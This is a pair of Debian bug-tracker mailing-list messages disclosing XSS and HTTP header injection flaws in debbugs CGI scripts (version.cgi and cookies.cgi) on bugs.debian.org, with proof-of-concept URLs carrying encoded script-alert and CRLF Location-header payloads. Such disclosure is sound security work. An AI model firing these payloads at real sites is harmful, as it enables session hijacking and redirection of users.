Bug#762967: XSS in bugs.debian.org/cgi-bin/version.cgi

[Vlad Constantin]

I'll add to this bug instead of making a new one.

/cgi-bin/cookies.cgi contains XSS (persistent via cookie) and Header
injection vulnerabilities in vars repeatmerged, terse, reverse, trim,
oldview

XSS PoC:
https://bugs.debian.org/cgi-bin/cookies.cgi?repeatmerged=%3Cscript%3Ealert('xss')%3B%3C/script%3E
Header injection PoC:
https://bugs.debian.org/cgi-bin/cookies.cgi?repeatmerged=%0aLocation%3A%20http%3A%2F%2Fgoogle.com%2F%0a

-v


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#762967: XSS in bugs.debian.org/cgi-bin/version.cgi

[Vlad Constantin]

Package: debbugs
Severity: important

bugs.debian.org/cgi-bin/version.cgi contains an XSS vulnerability in the
'package' var.

PoC:
https://bugs.debian.org/cgi-bin/version.cgi?info=1;package=%3C/title%3E%3Cscript%3Ealert('xss')%3B%3C/script%3E

-v


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org